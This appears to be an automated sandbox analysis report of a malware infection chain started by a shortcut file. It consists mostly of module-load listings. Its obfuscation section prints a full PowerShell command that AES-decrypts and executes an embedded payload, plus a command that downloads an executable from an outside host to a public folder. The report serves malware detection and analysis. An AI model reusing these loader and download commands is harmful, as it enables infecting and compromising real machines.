Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeSection loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeSection loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
Source: C:\Users\Public\Guard.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Guard.exeSection loaded: version.dll
Source: C:\Users\Public\Guard.exeSection loaded: winmm.dll
Source: C:\Users\Public\Guard.exeSection loaded: mpr.dll
Source: C:\Users\Public\Guard.exeSection loaded: wininet.dll
Source: C:\Users\Public\Guard.exeSection loaded: iphlpapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: userenv.dll
Source: C:\Users\Public\Guard.exeSection loaded: uxtheme.dll
Source: C:\Users\Public\Guard.exeSection loaded: kernel.appcore.dll
Source: C:\Users\Public\Guard.exeSection loaded: windows.storage.dll
Source: C:\Users\Public\Guard.exeSection loaded: wldp.dll
Source: C:\Users\Public\Guard.exeSection loaded: napinsp.dll
Source: C:\Users\Public\Guard.exeSection loaded: pnrpnsp.dll
Source: C:\Users\Public\Guard.exeSection loaded: wshbth.dll
Source: C:\Users\Public\Guard.exeSection loaded: nlaapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Guard.exeSection loaded: dnsapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: winrnr.dll
Source: C:\Users\Public\Guard.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: twext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cscui.dll
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: version.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: mpr.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wininet.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: rasadhlp.dll
Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: FzmtNV0vnG.lnkLNK file: ..\..\..\..\Windows\System32\Wbem\wmic.exe
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: sethc.pdbGCTL source: mshta.exe, 00000006.00000003.2128979328.000002428AD54000.00000004.00000020.00020000.00000000.sdmp, baochuan1[1].6.dr
Source: Binary string: sethc.pdb source: baochuan1[1].6.dr

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '5FC32DF1C0FFAB04AD1461E41B34580CF686186BB175883500353248755372D1E74F294A259C979896FEA6271F154228B3BF0D6A9D0D9F6569B9D41A9A3D09A63BCE9C837BE004A6208D93ACB87F6C547277A8C3268B742B3EF6AEA9AEAFEE59C43BF887EB0182FB5943B2947D27E46DFAAD9FE12776123E736F027853F8BC8DFCF554869724A0AA804A9049D9EA7ACBEED4C412BB6C4D4602CFC90CF615287E6C6555C8E0B6CEE3AACB66AFC773E9192903227F0CE014AE4A150CCCE925B6B22D440B7F3E392520613C07711AF2978A272709AFC70BEDE8C3201483207E66D3D483012204164092C58F5895F1B4B38C5CE831D1917AC33B6FF65EBC1F0946D72FFD582B689656A77B66A88C471D7DE4C8AAD142463BAC97A96E31AFC766F1FDD6B3267516F8027B807DBCDA9A77CC0B3EF0AFCA30DAE6A4A90E6590D26CF5960B3F113201E74E50BCC37179E67420FB07540AB18B8A281F6F6E1E0974AB449D8C5426F8776DCAD4AE3752D5ED8DD77E80E582F37E99699AC94D58A627C408F56A6BAB4FF2A4634255575F0A373CE9D4F81D7D85A6FDD69653A9ACD82342A04DE1D703FF55FD77C7093583E7A8DE7DD76FAA4FC7DC3AE525F2923AB6D03FA2CF6E1C0045EB1AE1B01FE2DCE5F0DF7AF916F7F3D8FFFCF35BA8DFEE6863AACCA2AF778D9372C039EF1AA4F66FE4C9A7B7E6B4B690EE8B5F365AFD2B94E0804532372C711FBB3284815793750781C1A32513D741D2441259E82D27F9EDAFE0F914EBC4098FCA1B2028271CE736D3BF191C47416E402EA4570B4E235E7AEE572814275E385B72FBB0EBB4E4A71440B44DF5AD9DD6C30D1FE13CF9470F4635440674E87C75280F2FD7AC139781FEE2CBD3BFB5E93BCAD4DAED74847E6BE4FD41C380DA9D3A7A21A32566CEC4C0BB9EAA0C494BAE968EB32720676452D8771B05F9FBED066BEEC71BED78275BC817D8373317584369A8DD60E296BA3A7576111EB07BB121D2FC9B92A15C9F813BAFBD25A0F89684CBA0692BCA686C8E2C8FC8B185E944941525012042EAF50007E259FC3ECD739FA2F61F6FB8325658A744B3E4DE0CED8D320510C3299CAE545C675E7E88D3B7A101C08FD1C8926471E91C6E79F62B497DD1CC8DD442A85E3C31FEB6E31E75149AA77C8D8B3DFE3CB4D3B9ED06691EE63BC9248DF964984D9E605967CD19AC1E1190D2B1FC8F1C2F12A7615AAF59A39ACFBDC1A5D1067B10A03DE63D10C8C973A264985FB7E40DC8D397B060C3C2144591271FF47D80C0C4EFD88E885F4D18CCA2CED83B8D1BD66297A6F61B3062A0F96F4B4DC0076B70FB8A8DD887142732D4A65A96B6FD7A0352D9488FAFF981B4E138BD5D5E350C18AD7F5DD70FB56686D79B20038823B95E423BC9AD64AA072C87E558C58E9D04720A12E07C3C08A91A0E105DC9FE126B797B360396173D676F52756A6E514D4757514A4D594F475365';function vxx ($xHDThLVi){return -split ($xHDThLVi -replace '..', '0x$& ')};$FMAPhot = vxx($ddg.SubString(0, 2048));$pBL = [System.Security.Cryptography.Aes]::Create();$pBL.Key = vxx($ddg.SubString(2048));$pBL.IV = New-Object byte[] 16;$KNBWNbH = $pBL.CreateDecryptor();$NjZFZrE = [System.String]::new($KNBWNbH.TransformFinalBlock($FMAPhot, 0,$FMAPhot.Length)); sal fd $NjZFZrE.Substring(3,3); fd $NjZFZrE.Substring(6)
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/gIpBYOi" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '5FC32DF1C0FFAB04AD1461E41B34580CF686186BB175883500353248755372D1E74F294A259C979896FEA6271F154228B3BF0D6A9D0D9F6569B9D41A9A3D09A63BCE9C837BE004A6208D93ACB87F6C547277A8C3268B742B3EF6AEA9AEAFEE59C43BF887EB0182FB5943B2947D27E46DFAAD9FE12776123E736F027853F8BC8DFCF554869724A0AA804A9049D9EA7ACBEED4C412BB6C4D4602CFC90CF615287E6C6555C8E0B6CEE3AACB66AFC773E9192903227F0CE014AE4A150CCCE925B6B22D440B7F3E392520613C07711AF2978A272709AFC70BEDE8C3201483207E66D3D483012204164092C58F5895F1B4B38C5CE831D1917AC33B6FF65EBC1F0946D72FFD582B689656A77B66A88C471D7DE4C8AAD142463BAC97A96E31AFC766F1FDD6B3267516F8027B807DBCDA9A77CC0B3EF0AFCA30DAE6A4A90E6590D26CF5960B3F113201E74E50BCC37179E67420FB07540AB18B8A281F6F6E1E0974AB449D8C5426F8776DCAD4AE3752D5ED8DD77E80E582F37E99699AC94D58A627C408F56A6BAB4FF2A4634255575F0A373CE9D4F81D7D85A6FDD69653A9ACD82342A04DE1D703FF55FD77C7093583E7A8DE7DD76FAA4FC7DC3AE525F2923AB6D03FA2CF6E1C0045EB1AE1B01FE2DCE5F0DF7AF916F7F3D8FFFCF35BA8DFEE6863AACCA2AF778D9372C039EF1AA4F66FE4C9A7B7E6B4B690EE8B5F365AFD2B94E0804532372C711FBB3284815793750781C1A32513D741D2441259E82D27F9EDAFE0F914EBC4098FCA1B2028271CE736D3BF191C47416E402EA4570B4E235E7AEE572814275E385B72FBB0EBB4E4A71440B44DF5AD9DD6C30D1FE13CF9470F4635440674E87C75280F2FD7AC139781FEE2CBD3BFB5E93BCAD4DAED74847E6BE4FD41C380DA9D3A7A21A32566CEC4C0BB9EAA0C494BAE968EB32720676452D8771B05F9FBED066BEEC71BED78275BC817D8373317584369A8DD60E296BA3A7576111EB07BB121D2FC9B92A15C9F813BAFBD25A0F89684CBA0692BCA686C8E2C8FC8B185E944941525012042EAF50007E259FC3ECD739FA2F61F6FB8325658A744B3E4DE0CED8D320510C3299CAE545C675E7E88D3B7A101C08FD1C8926471E91C6E79F62B497DD1CC8DD442A85E3C31FEB6E31E75149AA77C8D8B3DFE3CB4D3B9ED06691EE63BC9248DF964984D9E605967CD19AC1E1190D2B1FC8F1C2F12A7615AAF59A39ACFBDC1A5D1067B10A03DE63D10C8C973A264985FB7E40DC8D397B060C3C2144591271FF47D80C0C4EFD88E885F4D18CCA2CED83B8D1BD66297A6F61B3062A0F96F4B4DC0076B70FB8A8DD887142732D4A65A96B6FD7A0352D9488FAFF981B4E138BD5D5E350C18AD7F5DD70FB56686D79B20038823B95E423BC9AD64AA072C87E558C58E9D04720A12E07C3C08A91A0E105DC9FE126B797B360396173D676F52756A6E514D4757514A4D594F475365';function vxx ($xHDThLVi){return -split ($xHDThLVi -replace '..', '0x$& ')};$FMAPhot = vxx($ddg.SubString(0, 2048));$pBL = [System.Security.Cryptography.Aes]::Create();$pBL.Key = vxx($ddg.SubString(2048));$pBL.IV = New-Object byte[] 16;$KNBWNbH = $pBL.CreateDecryptor();$NjZFZrE = [System.String]::new($KNBWNbH.TransformFinalBlock($FMAPhot, 0,$FMAPhot.Length)); sal fd $NjZFZrE.Substring(3,3); fd $NjZFZrE.Substring(6)Jump to behavior
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/gIpBYOi" -OutFile "C:\Users\Public\Guard.exe""
Source: baochuan1[1].6.drStatic PE information: 0xDA18FDB4 [Thu Dec 13 08:35:00 2085 UTC]
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB8532F4 LoadLibraryA,GetProcAddress,15_2_00007FF7BB8532F4
Source: baochuan1[1].6.drStatic PE information: real checksum: 0x20826 should be: 0x735fd
Source: baochuan1[1].6.drStatic PE information: section name: .didat
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB817399 push rdi; ret 15_2_00007FF7BB8173A2
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB8178FD push rdi; ret 15_2_00007FF7BB817904
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FF8485800BD pushad ; iretd 20_2_00007FF8485800C1

Persistence and Installation Behavior

barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
